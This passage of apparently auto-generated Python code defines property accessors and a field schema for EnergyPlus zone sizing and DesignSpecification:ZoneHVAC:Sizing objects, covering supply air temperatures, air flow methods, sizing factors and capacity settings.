ValueError: if `value` is not a valid value
Returns:
float: the value of `zone_cooling_design_supply_air_temperature` or None if not set
"""
return self["Zone Cooling Design Supply Air Temperature"]
@zone_cooling_design_supply_air_temperature.setter
def zone_cooling_design_supply_air_temperature(self, value=None):
"""Corresponds to IDD field `Zone Cooling Design Supply Air
Temperature`"""
self["Zone Cooling Design Supply Air Temperature"] = value
@property
def zone_cooling_design_supply_air_temperature_difference(self):
"""field `Zone Cooling Design Supply Air Temperature Difference`
| Zone Cooling Design Supply Air Temperature is only used when Zone Cooling Design
| Supply Air Temperature Input Method = TemperatureDifference
| The absolute value of this field will be subtracted from the zone temperature
| at peak load to calculate the Zone Cooling Design Supply Air Temperature.
| Units: deltaC
Args:
value (float): value for IDD Field `Zone Cooling Design Supply Air Temperature Difference`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `zone_cooling_design_supply_air_temperature_difference` or None if not set
"""
return self["Zone Cooling Design Supply Air Temperature Difference"]
@zone_cooling_design_supply_air_temperature_difference.setter
def zone_cooling_design_supply_air_temperature_difference(
self,
value=None):
"""Corresponds to IDD field `Zone Cooling Design Supply Air Temperature
Difference`"""
self["Zone Cooling Design Supply Air Temperature Difference"] = value
@property
def zone_heating_design_supply_air_temperature_input_method(self):
"""field `Zone Heating Design Supply Air Temperature Input Method`
| Default value: SupplyAirTemperature
Args:
value (str): value for IDD Field `Zone Heating Design Supply Air Temperature Input Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `zone_heating_design_supply_air_temperature_input_method` or None if not set
"""
return self["Zone Heating Design Supply Air Temperature Input Method"]
@zone_heating_design_supply_air_temperature_input_method.setter
def zone_heating_design_supply_air_temperature_input_method(
self,
value="SupplyAirTemperature"):
"""Corresponds to IDD field `Zone Heating Design Supply Air Temperature
Input Method`"""
self["Zone Heating Design Supply Air Temperature Input Method"] = value
@property
def zone_heating_design_supply_air_temperature(self):
"""field `Zone Heating Design Supply Air Temperature`
| Zone Heating Design Supply Air Temperature is only used when Zone Heating Design
| Supply Air Temperature Input Method = SupplyAirTemperature
| Units: C
Args:
value (float): value for IDD Field `Zone Heating Design Supply Air Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `zone_heating_design_supply_air_temperature` or None if not set
"""
return self["Zone Heating Design Supply Air Temperature"]
@zone_heating_design_supply_air_temperature.setter
def zone_heating_design_supply_air_temperature(self, value=None):
"""Corresponds to IDD field `Zone Heating Design Supply Air
Temperature`"""
self["Zone Heating Design Supply Air Temperature"] = value
@property
def zone_heating_design_supply_air_temperature_difference(self):
"""field `Zone Heating Design Supply Air Temperature Difference`
| Zone Heating Design Supply Air Temperature is only used when Zone Heating Design
| Supply Air Temperature Input Method = TemperatureDifference
| The absolute value of this field will be added to the zone temperature
| at peak load to calculate the Zone Heating Design Supply Air Temperature.
| Units: deltaC
Args:
value (float): value for IDD Field `Zone Heating Design Supply Air Temperature Difference`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `zone_heating_design_supply_air_temperature_difference` or None if not set
"""
return self["Zone Heating Design Supply Air Temperature Difference"]
@zone_heating_design_supply_air_temperature_difference.setter
def zone_heating_design_supply_air_temperature_difference(
self,
value=None):
"""Corresponds to IDD field `Zone Heating Design Supply Air Temperature
Difference`"""
self["Zone Heating Design Supply Air Temperature Difference"] = value
@property
def zone_cooling_design_supply_air_humidity_ratio(self):
"""field `Zone Cooling Design Supply Air Humidity Ratio`
| Units: kgWater/kgDryAir
Args:
value (float): value for IDD Field `Zone Cooling Design Supply Air Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `zone_cooling_design_supply_air_humidity_ratio` or None if not set
"""
return self["Zone Cooling Design Supply Air Humidity Ratio"]
@zone_cooling_design_supply_air_humidity_ratio.setter
def zone_cooling_design_supply_air_humidity_ratio(self, value=None):
"""Corresponds to IDD field `Zone Cooling Design Supply Air Humidity
Ratio`"""
self["Zone Cooling Design Supply Air Humidity Ratio"] = value
@property
def zone_heating_design_supply_air_humidity_ratio(self):
"""field `Zone Heating Design Supply Air Humidity Ratio`
| Units: kgWater/kgDryAir
Args:
value (float): value for IDD Field `Zone Heating Design Supply Air Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `zone_heating_design_supply_air_humidity_ratio` or None if not set
"""
return self["Zone Heating Design Supply Air Humidity Ratio"]
@zone_heating_design_supply_air_humidity_ratio.setter
def zone_heating_design_supply_air_humidity_ratio(self, value=None):
"""Corresponds to IDD field `Zone Heating Design Supply Air Humidity
Ratio`"""
self["Zone Heating Design Supply Air Humidity Ratio"] = value
@property
def design_specification_outdoor_air_object_name(self):
"""field `Design Specification Outdoor Air Object Name`
Args:
value (str): value for IDD Field `Design Specification Outdoor Air Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `design_specification_outdoor_air_object_name` or None if not set
"""
return self["Design Specification Outdoor Air Object Name"]
@design_specification_outdoor_air_object_name.setter
def design_specification_outdoor_air_object_name(self, value=None):
"""Corresponds to IDD field `Design Specification Outdoor Air Object
Name`"""
self["Design Specification Outdoor Air Object Name"] = value
@property
def zone_heating_sizing_factor(self):
"""field `Zone Heating Sizing Factor`
| if blank or zero, global heating sizing factor from Sizing:Parameters is used.
Args:
value (float): value for IDD Field `Zone Heating Sizing Factor`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `zone_heating_sizing_factor` or None if not set
"""
return self["Zone Heating Sizing Factor"]
@zone_heating_sizing_factor.setter
def zone_heating_sizing_factor(self, value=None):
"""Corresponds to IDD field `Zone Heating Sizing Factor`"""
self["Zone Heating Sizing Factor"] = value
@property
def zone_cooling_sizing_factor(self):
"""field `Zone Cooling Sizing Factor`
| if blank or zero, global cooling sizing factor from Sizing:Parameters is used.
Args:
value (float): value for IDD Field `Zone Cooling Sizing Factor`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `zone_cooling_sizing_factor` or None if not set
"""
return self["Zone Cooling Sizing Factor"]
@zone_cooling_sizing_factor.setter
def zone_cooling_sizing_factor(self, value=None):
"""Corresponds to IDD field `Zone Cooling Sizing Factor`"""
self["Zone Cooling Sizing Factor"] = value
@property
def cooling_design_air_flow_method(self):
"""field `Cooling Design Air Flow Method`
| Default value: DesignDay
Args:
value (str): value for IDD Field `Cooling Design Air Flow Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_design_air_flow_method` or None if not set
"""
return self["Cooling Design Air Flow Method"]
@cooling_design_air_flow_method.setter
def cooling_design_air_flow_method(self, value="DesignDay"):
"""Corresponds to IDD field `Cooling Design Air Flow Method`"""
self["Cooling Design Air Flow Method"] = value
@property
def cooling_design_air_flow_rate(self):
"""field `Cooling Design Air Flow Rate`
| This input is used if Cooling Design Air Flow Method is Flow/Zone
| This value will be multiplied by the global or zone sizing factor and
| by zone multipliers.
| Units: m3/s
Args:
value (float): value for IDD Field `Cooling Design Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_design_air_flow_rate` or None if not set
"""
return self["Cooling Design Air Flow Rate"]
@cooling_design_air_flow_rate.setter
def cooling_design_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Cooling Design Air Flow Rate`"""
self["Cooling Design Air Flow Rate"] = value
@property
def cooling_minimum_air_flow_per_zone_floor_area(self):
"""field `Cooling Minimum Air Flow per Zone Floor Area`
| default is .15 cfm/ft2
| This input is used if Cooling Design Air Flow Method is DesignDayWithLimit
| Units: m3/s-m2
| Default value: 0.000762
Args:
value (float): value for IDD Field `Cooling Minimum Air Flow per Zone Floor Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_minimum_air_flow_per_zone_floor_area` or None if not set
"""
return self["Cooling Minimum Air Flow per Zone Floor Area"]
@cooling_minimum_air_flow_per_zone_floor_area.setter
def cooling_minimum_air_flow_per_zone_floor_area(self, value=0.000762):
"""Corresponds to IDD field `Cooling Minimum Air Flow per Zone Floor
Area`"""
self["Cooling Minimum Air Flow per Zone Floor Area"] = value
@property
def cooling_minimum_air_flow(self):
"""field `Cooling Minimum Air Flow`
| This input is used if Cooling Design Air Flow Method is DesignDayWithLimit
| Units: m3/s
Args:
value (float): value for IDD Field `Cooling Minimum Air Flow`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_minimum_air_flow` or None if not set
"""
return self["Cooling Minimum Air Flow"]
@cooling_minimum_air_flow.setter
def cooling_minimum_air_flow(self, value=None):
"""Corresponds to IDD field `Cooling Minimum Air Flow`"""
self["Cooling Minimum Air Flow"] = value
@property
def cooling_minimum_air_flow_fraction(self):
"""field `Cooling Minimum Air Flow Fraction`
| fraction of the Cooling design Air Flow Rate
| This input is currently used in sizing the Fan minimum Flow Rate.
| It does not currently affect other component autosizing.
Args:
value (float): value for IDD Field `Cooling Minimum Air Flow Fraction`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_minimum_air_flow_fraction` or None if not set
"""
return self["Cooling Minimum Air Flow Fraction"]
@cooling_minimum_air_flow_fraction.setter
def cooling_minimum_air_flow_fraction(self, value=None):
"""Corresponds to IDD field `Cooling Minimum Air Flow Fraction`"""
self["Cooling Minimum Air Flow Fraction"] = value
@property
def heating_design_air_flow_method(self):
"""field `Heating Design Air Flow Method`
| Default value: DesignDay
Args:
value (str): value for IDD Field `Heating Design Air Flow Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_design_air_flow_method` or None if not set
"""
return self["Heating Design Air Flow Method"]
@heating_design_air_flow_method.setter
def heating_design_air_flow_method(self, value="DesignDay"):
"""Corresponds to IDD field `Heating Design Air Flow Method`"""
self["Heating Design Air Flow Method"] = value
@property
def heating_design_air_flow_rate(self):
"""field `Heating Design Air Flow Rate`
| This input is used if Heating Design Air Flow Method is Flow/Zone.
| This value will be multiplied by the global or zone sizing factor and
| by zone multipliers.
| Units: m3/s
Args:
value (float): value for IDD Field `Heating Design Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_design_air_flow_rate` or None if not set
"""
return self["Heating Design Air Flow Rate"]
@heating_design_air_flow_rate.setter
def heating_design_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Heating Design Air Flow Rate`"""
self["Heating Design Air Flow Rate"] = value
@property
def heating_maximum_air_flow_per_zone_floor_area(self):
"""field `Heating Maximum Air Flow per Zone Floor Area`
| default is .40 cfm/ft2
| This field is used to size the heating design flow rate when Heating Design Air Flow Method = Flow/Zone.
| This input is used for autosizing components when Heating Design Air Flow Method = DesignDayWithLimit.
| Units: m3/s-m2
| Default value: 0.002032
Args:
value (float): value for IDD Field `Heating Maximum Air Flow per Zone Floor Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_maximum_air_flow_per_zone_floor_area` or None if not set
"""
return self["Heating Maximum Air Flow per Zone Floor Area"]
@heating_maximum_air_flow_per_zone_floor_area.setter
def heating_maximum_air_flow_per_zone_floor_area(self, value=0.002032):
"""Corresponds to IDD field `Heating Maximum Air Flow per Zone Floor
Area`"""
self["Heating Maximum Air Flow per Zone Floor Area"] = value
@property
def heating_maximum_air_flow(self):
"""field `Heating Maximum Air Flow`
| default is 300 cfm
| This input is used for autosizing components when Heating Design Air Flow Method = DesignDayWithLimit.
| Units: m3/s
| Default value: 0.1415762
Args:
value (float): value for IDD Field `Heating Maximum Air Flow`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_maximum_air_flow` or None if not set
"""
return self["Heating Maximum Air Flow"]
@heating_maximum_air_flow.setter
def heating_maximum_air_flow(self, value=0.1415762):
"""Corresponds to IDD field `Heating Maximum Air Flow`"""
self["Heating Maximum Air Flow"] = value
@property
def heating_maximum_air_flow_fraction(self):
"""field `Heating Maximum Air Flow Fraction`
| fraction of the Heating Design Air Flow Rate
| This input is used for autosizing components when Heating Design Air Flow Method = DesignDayWithLimit.
| Default value: 0.3
Args:
value (float): value for IDD Field `Heating Maximum Air Flow Fraction`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_maximum_air_flow_fraction` or None if not set
"""
return self["Heating Maximum Air Flow Fraction"]
@heating_maximum_air_flow_fraction.setter
def heating_maximum_air_flow_fraction(self, value=0.3):
"""Corresponds to IDD field `Heating Maximum Air Flow Fraction`"""
self["Heating Maximum Air Flow Fraction"] = value
@property
def design_specification_zone_air_distribution_object_name(self):
"""field `Design Specification Zone Air Distribution Object Name`
Args:
value (str): value for IDD Field `Design Specification Zone Air Distribution Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `design_specification_zone_air_distribution_object_name` or None if not set
"""
return self["Design Specification Zone Air Distribution Object Name"]
@design_specification_zone_air_distribution_object_name.setter
def design_specification_zone_air_distribution_object_name(
self,
value=None):
"""Corresponds to IDD field `Design Specification Zone Air Distribution
Object Name`"""
self["Design Specification Zone Air Distribution Object Name"] = value
@property
def account_for_dedicated_outdoor_air_system(self):
"""field `Account for Dedicated Outdoor Air System`
| account for effect of dedicated outdoor air system supplying air directly to the zone
| Default value: No
Args:
value (str): value for IDD Field `Account for Dedicated Outdoor Air System`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `account_for_dedicated_outdoor_air_system` or None if not set
"""
return self["Account for Dedicated Outdoor Air System"]
@account_for_dedicated_outdoor_air_system.setter
def account_for_dedicated_outdoor_air_system(self, value="No"):
"""Corresponds to IDD field `Account for Dedicated Outdoor Air
System`"""
self["Account for Dedicated Outdoor Air System"] = value
@property
def dedicated_outdoor_air_system_control_strategy(self):
"""field `Dedicated Outdoor Air System Control Strategy`
| 1)supply neutral ventilation air; 2)supply neutral dehumidified and reheated
| ventilation air; 3)supply cold ventilation air
| Default value: NeutralSupplyAir
Args:
value (str): value for IDD Field `Dedicated Outdoor Air System Control Strategy`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `dedicated_outdoor_air_system_control_strategy` or None if not set
"""
return self["Dedicated Outdoor Air System Control Strategy"]
@dedicated_outdoor_air_system_control_strategy.setter
def dedicated_outdoor_air_system_control_strategy(
self,
value="NeutralSupplyAir"):
"""Corresponds to IDD field `Dedicated Outdoor Air System Control
Strategy`"""
self["Dedicated Outdoor Air System Control Strategy"] = value
@property
def dedicated_outdoor_air_low_setpoint_temperature_for_design(self):
"""field `Dedicated Outdoor Air Low Setpoint Temperature for Design`
| Units: C
| Default value: "autosize"
Args:
value (float or "Autosize"): value for IDD Field `Dedicated Outdoor Air Low Setpoint Temperature for Design`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `dedicated_outdoor_air_low_setpoint_temperature_for_design` or None if not set
"""
return self[
"Dedicated Outdoor Air Low Setpoint Temperature for Design"]
@dedicated_outdoor_air_low_setpoint_temperature_for_design.setter
def dedicated_outdoor_air_low_setpoint_temperature_for_design(
self,
value="autosize"):
"""Corresponds to IDD field `Dedicated Outdoor Air Low Setpoint
Temperature for Design`"""
self[
"Dedicated Outdoor Air Low Setpoint Temperature for Design"] = value
@property
def dedicated_outdoor_air_high_setpoint_temperature_for_design(self):
"""field `Dedicated Outdoor Air High Setpoint Temperature for Design`
| Units: C
| Default value: "autosize"
Args:
value (float or "Autosize"): value for IDD Field `Dedicated Outdoor Air High Setpoint Temperature for Design`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `dedicated_outdoor_air_high_setpoint_temperature_for_design` or None if not set
"""
return self[
"Dedicated Outdoor Air High Setpoint Temperature for Design"]
@dedicated_outdoor_air_high_setpoint_temperature_for_design.setter
def dedicated_outdoor_air_high_setpoint_temperature_for_design(
self,
value="autosize"):
"""Corresponds to IDD field `Dedicated Outdoor Air High Setpoint
Temperature for Design`"""
self[
"Dedicated Outdoor Air High Setpoint Temperature for Design"] = value
class DesignSpecificationZoneHvacSizing(DataObject):
""" Corresponds to IDD object `DesignSpecification:ZoneHVAC:Sizing`
This object is used to describe general scalable zone HVAC equipment sizing which
are referenced by other objects.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'cooling supply air flow rate method',
{'name': u'Cooling Supply Air Flow Rate Method',
'pyname': u'cooling_supply_air_flow_rate_method',
'default': u'SupplyAirFlowRate',
'required-field': False,
'autosizable': False,
'accepted-values': [u'None',
u'SupplyAirFlowRate',
u'FlowPerFloorArea',
u'FractionOfAutosizedCoolingAirflow',
u'FlowPerCoolingCapacity'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling supply air flow rate',
{'name': u'Cooling Supply Air Flow Rate',
'pyname': u'cooling_supply_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'cooling supply air flow rate per floor area',
{'name': u'Cooling Supply Air Flow Rate Per Floor Area',
'pyname': u'cooling_supply_air_flow_rate_per_floor_area',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-m2'}),
(u'cooling fraction of autosized cooling supply air flow rate',
{'name': u'Cooling Fraction of Autosized Cooling Supply Air Flow Rate',
'pyname': u'cooling_fraction_of_autosized_cooling_supply_air_flow_rate',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'cooling supply air flow rate per unit cooling capacity',
{'name': u'Cooling Supply Air Flow Rate Per Unit Cooling Capacity',
'pyname': u'cooling_supply_air_flow_rate_per_unit_cooling_capacity',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-W'}),
(u'no load supply air flow rate method',
{'name': u'No Load Supply Air Flow Rate Method',
'pyname': u'no_load_supply_air_flow_rate_method',
'default': u'SupplyAirFlowRate',
'required-field': False,
'autosizable': False,
'accepted-values': [u'None',
u'SupplyAirFlowRate',
u'FlowPerFloorArea',
u'FractionOfAutosizedCoolingAirflow',
u'FractionOfAutosizedHeatingAirflow'],
'autocalculatable': False,
'type': 'alpha'}),
(u'no load supply air flow rate',
{'name': u'No Load Supply Air Flow Rate',
'pyname': u'no_load_supply_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'no load supply air flow rate per floor area',
{'name': u'No Load Supply Air Flow Rate Per Floor Area',
'pyname': u'no_load_supply_air_flow_rate_per_floor_area',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-m2'}),
(u'no load fraction of cooling supply air flow rate',
{'name': u'No Load Fraction of Cooling Supply Air Flow Rate',
'pyname': u'no_load_fraction_of_cooling_supply_air_flow_rate',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'no load fraction of heating supply air flow rate',
{'name': u'No Load Fraction of Heating Supply Air Flow Rate',
'pyname': u'no_load_fraction_of_heating_supply_air_flow_rate',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'heating supply air flow rate method',
{'name': u'Heating Supply Air Flow Rate Method',
'pyname': u'heating_supply_air_flow_rate_method',
'default': u'SupplyAirFlowRate',
'required-field': False,
'autosizable': False,
'accepted-values': [u'None',
u'SupplyAirFlowRate',
u'FlowPerFloorArea',
u'FractionOfAutosizedHeatingAirflow',
u'FlowPerHeatingCapacity'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating supply air flow rate',
{'name': u'Heating Supply Air Flow Rate',
'pyname': u'heating_supply_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating supply air flow rate per floor area',
{'name': u'Heating Supply Air Flow Rate Per Floor Area',
'pyname': u'heating_supply_air_flow_rate_per_floor_area',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-m2'}),
(u'heating fraction of heating supply air flow rate',
{'name': u'Heating Fraction of Heating Supply Air Flow Rate',
'pyname': u'heating_fraction_of_heating_supply_air_flow_rate',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'heating supply air flow rate per unit heating capacity',
{'name': u'Heating Supply Air Flow Rate Per Unit Heating Capacity',
'pyname': u'heating_supply_air_flow_rate_per_unit_heating_capacity',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-W'}),
(u'cooling design capacity method',
{'name': u'Cooling Design Capacity Method',
'pyname': u'cooling_design_capacity_method',
'default': u'None',
'required-field': False,
'autosizable': False,
'accepted-values': [u'None',
u'CoolingDesignCapacity',
u'CapacityPerFloorArea',
u'FractionOfAutosizedCoolingCapacity'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling design capacity',
{'name': u'Cooling Design Capacity',
'pyname': u'cooling_design_capacity',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'W'}),
(u'cooling design capacity per floor area',
{'name': u'Cooling Design Capacity Per Floor Area',
'pyname': u'cooling_design_capacity_per_floor_area',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m2'}),
(u'fraction of autosized cooling design capacity',
{'name': u'Fraction of Autosized Cooling Design Capacity',
'pyname': u'fraction_of_autosized_cooling_design_capacity',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'heating design capacity method',
{'name': u'Heating Design Capacity Method',
'pyname': u'heating_design_capacity_method',
'default': u'None',
'required-field': False,
'autosizable': False,
'accepted-values': [u'None',
u'HeatingDesignCapacity',
u'CapacityPerFloorArea',
u'FractionOfAutosizedHeatingCapacity'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating design capacity',
{'name': u'Heating Design Capacity',
'pyname': u'heating_design_capacity',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'W'}),
(u'heating design capacity per floor area',
{'name': u'Heating Design Capacity Per Floor Area',
'pyname': u'heating_design_capacity_per_floor_area',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m2'}),
(u'fraction of autosized heating design capacity',
{'name': u'Fraction of Autosized Heating Design Capacity',
'pyname': u'fraction_of_autosized_heating_design_capacity',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'})]),
'format': None,
'group': u'HVAC Design Objects',
'min-fields': 1,
'name': u'DesignSpecification:ZoneHVAC:Sizing',
'pyname': u'DesignSpecificationZoneHvacSizing',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def cooling_supply_air_flow_rate_method(self):
"""field `Cooling Supply Air Flow Rate Method`
| Enter the method used to determine the cooling supply air volume flow rate.
| None is used when a cooling coil is not included in the Zone HVAC Equip or this field
| may be blank. SupplyAirFlowRate => selected when the magnitude of the supply air volume
| flow rate is specified. FlowPerFloorArea => selected when the supply air volume flow rate
| is determined from total floor area served by the Zone HVAC unit and Flow Per Floor Area
| value specified. FractionOfAutosizedCoolingAirflow => is selected when the supply air volume
| is determined from a user specified fraction and the autosized cooling supply air flow rate
| value determined by the simulation. FlowPerCoolingCapacity => is selected when the supply
| air volume is determined from user specified flow per Cooling Capacity and Cooling Capacity
| determined by the simulation.
| Default value: SupplyAirFlowRate
Args:
value (str): value for IDD Field `Cooling Supply Air Flow Rate Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_supply_air_flow_rate_method` or None if not set
"""
return self["Cooling Supply Air Flow Rate Method"]
@cooling_supply_air_flow_rate_method.setter
def cooling_supply_air_flow_rate_method(self, value="SupplyAirFlowRate"):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate Method`"""
self["Cooling Supply Air Flow Rate Method"] = value
@property
def cooling_supply_air_flow_rate(self):
"""field `Cooling Supply Air Flow Rate`
| Enter the magnitude of supply air volume flow rate during cooling operation.
| Required field when Cooling Supply Air Flow Rate Method is SupplyAirFlowRate.
| This field may be blank if a cooling coil is not included in the Zone HVAC equipment.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Cooling Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `cooling_supply_air_flow_rate` or None if not set
"""
return self["Cooling Supply Air Flow Rate"]
@cooling_supply_air_flow_rate.setter
def cooling_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate`"""
self["Cooling Supply Air Flow Rate"] = value
@property
def cooling_supply_air_flow_rate_per_floor_area(self):
"""field `Cooling Supply Air Flow Rate Per Floor Area`
| Enter the cooling supply air volume flow rate per total conditioned floor area.
| Required field when Cooling Supply Air Flow Rate Method is FlowPerFloorArea.
| This field may be blank if a cooling coil is not included in the Zone HVAC equipment.
| Units: m3/s-m2
Args:
value (float): value for IDD Field `Cooling Supply Air Flow Rate Per Floor Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_supply_air_flow_rate_per_floor_area` or None if not set
"""
return self["Cooling Supply Air Flow Rate Per Floor Area"]
@cooling_supply_air_flow_rate_per_floor_area.setter
def cooling_supply_air_flow_rate_per_floor_area(self, value=None):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate Per Floor
Area`"""
self["Cooling Supply Air Flow Rate Per Floor Area"] = value
@property
def cooling_fraction_of_autosized_cooling_supply_air_flow_rate(self):
"""field `Cooling Fraction of Autosized Cooling Supply Air Flow Rate`
| Enter the supply air volume flow rate as a fraction of the cooling supply air flow rate.
| Required field when Cooling Supply Air Flow Rate Method is
| FractionOfAutosizedCoolingAirflow.
| This field may be blank if a cooling coil is not included in the Zone HVAC equipment.
Args:
value (float): value for IDD Field `Cooling Fraction of Autosized Cooling Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_fraction_of_autosized_cooling_supply_air_flow_rate` or None if not set
"""
return self[
"Cooling Fraction of Autosized Cooling Supply Air Flow Rate"]
@cooling_fraction_of_autosized_cooling_supply_air_flow_rate.setter
def cooling_fraction_of_autosized_cooling_supply_air_flow_rate(
self,
value=None):
"""Corresponds to IDD field `Cooling Fraction of Autosized Cooling
Supply Air Flow Rate`"""
self[
"Cooling Fraction of Autosized Cooling Supply Air Flow Rate"] = value
@property
def cooling_supply_air_flow_rate_per_unit_cooling_capacity(self):
"""field `Cooling Supply Air Flow Rate Per Unit Cooling Capacity`
| Enter the cooling supply air volume flow rate unit cooling capacity.
| Required field when Cooling Supply Air Flow Rate Method is
| FlowPerCoolingCapacity. This field may be blank if a cooling coil is not
| included in the Zone HVAC equipment.
| Units: m3/s-W
Args:
value (float): value for IDD Field `Cooling Supply Air Flow Rate Per Unit Cooling Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_supply_air_flow_rate_per_unit_cooling_capacity` or None if not set
"""
return self["Cooling Supply Air Flow Rate Per Unit Cooling Capacity"]
@cooling_supply_air_flow_rate_per_unit_cooling_capacity.setter
def cooling_supply_air_flow_rate_per_unit_cooling_capacity(
self,
value=None):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate Per Unit
Cooling Capacity`"""
self["Cooling Supply Air Flow Rate Per Unit Cooling Capacity"] = value
@property
def no_load_supply_air_flow_rate_method(self):
"""field `No Load Supply Air Flow Rate Method`
| Enter the method used to determine the supply air volume flow rate When No Cooling or Heating
| is Required. None is used when a cooling or heating coil is not included in the Zone HVAC
| Equipment or this field may be blank. SupplyAirFlowRate => selected when the magnitude of the
| supply air volume flow rate is specified. FlowPerFloorArea => selected when the supply air
| volume flow rate is determined from total floor area served by the Zone HVAC unit and Flow Per
| Floor Area is specified. FractionOfAutosizedCoolingAirflow => is selected when the supply
| air volume is determined from a user specified fraction and the Autosized cooling supply
| air flow rate value determined by the simulation. FractionOfAutosizedHeatingAirflow => is
| selected when the supply air volume is determined from a user specified fraction and the
| Autosized heating supply air flow rate value determined by the simulation.
| Default value: SupplyAirFlowRate
Args:
value (str): value for IDD Field `No Load Supply Air Flow Rate Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `no_load_supply_air_flow_rate_method` or None if not set
"""
return self["No Load Supply Air Flow Rate Method"]
@no_load_supply_air_flow_rate_method.setter
def no_load_supply_air_flow_rate_method(self, value="SupplyAirFlowRate"):
"""Corresponds to IDD field `No Load Supply Air Flow Rate Method`"""
self["No Load Supply Air Flow Rate Method"] = value
@property
def no_load_supply_air_flow_rate(self):
"""field `No Load Supply Air Flow Rate`
| Enter the magnitude of the supply air volume flow rate during when no cooling or heating
| is required. Required field when No Load Supply Air Flow Rate Method
| is SupplyAirFlowRate.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `No Load Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `no_load_supply_air_flow_rate` or None if not set
"""
return self["No Load Supply Air Flow Rate"]
@no_load_supply_air_flow_rate.setter
def no_load_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `No Load Supply Air Flow Rate`"""
self["No Load Supply Air Flow Rate"] = value
@property
